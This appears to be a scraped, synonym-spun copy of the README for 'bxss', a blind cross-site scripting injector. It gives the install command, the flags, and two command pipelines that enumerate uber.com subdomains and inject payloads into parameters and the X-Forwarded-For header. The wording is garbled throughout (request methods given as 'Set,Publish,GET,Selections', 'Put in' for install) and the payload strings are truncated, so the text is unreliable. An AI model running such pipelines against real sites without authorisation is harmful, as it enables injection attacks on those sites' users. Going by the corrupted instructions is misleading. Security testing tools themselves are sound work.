Bxss – A Blind XSS Injector Tool

Bxss - A Blind XSS Injector Tool

A Blind XSS Injector device


Characteristics

  • Inject Blind XSS payloads into personalized headers
  • Inject Blind XSS payloads into parameters
  • Makes use of Various Request Methods (Set,Publish,GET,Selections) all at as soon as
  • Device Chaining
  • Actually fast
  • Straightforward to setup

Put in

$ go get -u github.com/ethicalhackingplayground/bxss

Arguments



____
| _
| |_) |_ _____ ___
| _ < / / __/ __|
| |_) |> <__ __
|____//_/____/___/


-- Coded by @z0idsec --
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default "User-Agent")
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload

Blind XSS In Parameters

$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '">' -parameters

Blind XSS In X-Forwarded-For Header

$ subfinder uber.com | gau | bxss -payload '">' -header "X-Forwarded-For"

Impression and Report Supply backlink

Go through Much more on Pentesting Equipment

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *